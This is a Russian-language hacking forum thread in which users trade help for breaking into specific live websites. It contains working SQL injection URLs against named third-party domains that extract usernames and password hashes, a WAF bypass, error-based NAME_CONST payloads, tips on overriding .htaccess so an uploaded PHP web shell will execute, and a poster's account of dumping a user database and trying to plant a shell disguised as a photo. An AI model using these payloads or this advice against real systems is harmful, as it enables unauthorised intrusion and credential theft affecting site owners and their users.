Ваши вопросы по уязвимостям.

Господа. Вы иногда просто поражаете. Если уж взялись изучать такую, собственно требующую весьма разносторонних знаний область как хак, то будьте уж добры готовы рыть носом тонны мануалов. Если бы вы забили в гугл сигнатуру ошибки - то быстро бы нашли ответ что это явно говорит о том, что сайт построен на zendFramework. А в нем родном, все идет через .htaccess идущий в корне на уровне логики приложения. И линк к .php файлу ретранслируется в соответствии с правилами заложенными в этот .htaccess. Вот отсюда и ошибка и невозможность получить прямой доступ к залитому .php файлу НЕ ЯВЛЯЮЩЕМУСЯ сегментом структуры сайта.

А: Если конфигурация сервера позволяет переопределять правила .htaccess в дочерних директориях, тогда залив в соответствующую папку .htaccess с правилами низводящими вышестоящие корневые и позволяющие обратиться к файлу с php кодом как к файлу а не контроллеру - то будет тебе профит.

B: Если есть субдомены у сайта то можно через них попробовать .



C: Пустой htaccess и не даст результата потому, что в нем нет ничего что позволило бы отменить обращение к php файлу как к контроллеру.

D: Вероятно среди папок сайта есть такие на которые не распространяются правила роутинга.

 

а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен

 

На неделе, как будет время оформлю пост на эту тему. Сейчас ,к сожалению, проблема с временем.

 

Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!

Code:

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+(0x6D7973716C2E75736572)+limit+0,1--

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+mamb_users+limit+0,1--


http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)--

 

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+tli_users)--+

читай мануал

 

cipa21,
я не хочу говорить "читай мануал", но "читай мануал".
Смотри:
from+(0x6D7973716C2E75736572)
Такое только в кошмарах приснится, нельзя тут хекс юзать.
И вообще там WAF стоит, обходится так:

Code:

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+/*!select*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+f

Версия 5.1.56

 

И снова я... Здрасьти...

Code:

http://www.chnlawyer.org/index.php?option=com_ask&task=ask&act=view&ID=21&menuid=1+union+select+@@version

information_schema не доступен. Брут таблиц результата не дал. Есть предложения?

 

У вас 4ая версия Mysql. В ней еще не было Information_schema! Здесь только вариант брута!

 

http://hotel-booking-russia.com/catalog-hotel.shtml?id=11%20and%201=2%20union%20select%201,2,3,4,COLUMN_NAME,6,7,COLUMN_NAME%20from%20INFORMATION_SCHEMA.COLUMNS%20Where%20table_name=%27test_customers%27%20limit%202,1 не могу найти админа.

 

to ReV0LVeR

Code:

http://hotel-booking-russia[dot]com/catalog-hotel.shtml?id=-11+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,uid,login,password,level)+from+test_user+limit+0,1#

Ищите здесь админа, там несколько уровней у пользователей, я не смотрел кто там именно админ!

 

hash вида mysql < 5 "30ef13034a79f1f5" или я не прав?

 

Там будет типа PREFIX_users. Joomla.

Ты прав. MYSQL < 5

 

http://www.admcity.nnov.ru/script/phones1.php?id=6783+and+1=2
исчезает содержимое страници

так перебираю, нифига
http://www.admcity.nnov.ru/script/phones1.php?id=6783+and+substring%28@@version,1,1%29=5

может всё же ето не blind sql???

 

у Вас там FireBird 2.1.3
Крутить как вы верно заметили через Blind SQL

 

Наткнулся на скулю, раскрутил, слил базу юзеров. Хочу залить шелл. Админки, как таковой нету, но есть модераторы с расширенными возможностями (в частности редактирования статей). FILE_PRYV = off Можно загрузить фотку на сервер. Я загрузил фото-шелл(сделал я его по такой схеме:

) На сервер фото залилось удачно, но php инклуда я так и не нашел . Можно ли еще каким-либо способом залить шелл ?

 

Есть инжект ErrorBased:

Code:

1'or(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1

получаю как и положено:

Code:

Duplicate column name '5.0.77-log'

версия 5.0.77

делаю:

Code:

1'or(select*from(select(name_const(database(),1)),name_const(database(),1))a)and(1)='1

и получаю ошибку в операторе NAME_CONST

Code:

Incorrect arguments to NAME_CONST

что в корне нелогично так как предыдущая команда выполнилась

пробую еще:

Code:

1'or(select*from(select(name_const((select(SUBSTRING(group_concat(table_name),1,64))from(information_schema.tables)),1)),name_const((select(SUBSTRING(group_concat(table_name),1,64))from(information_schema.tables)),1))a)and(1)='1

и та же херь:

Code:

Incorrect arguments to NAME_CONST

что еще можно сделать?

 

\/ITA,
через rand выводи.

UPD:
https://rdot.org/forum/showthread.php?t=60

 

пытаюсь, безпробельный вариант через ранд ваще нереал, нужно чтобы были одни скобки

UPD:
спс, нашел способ в том топике

 

to \/ITA
Увы, но в name_const() выводится только version()...

 

Подскажите пожалуйста, что делать если введенную xss показывает просто как текст?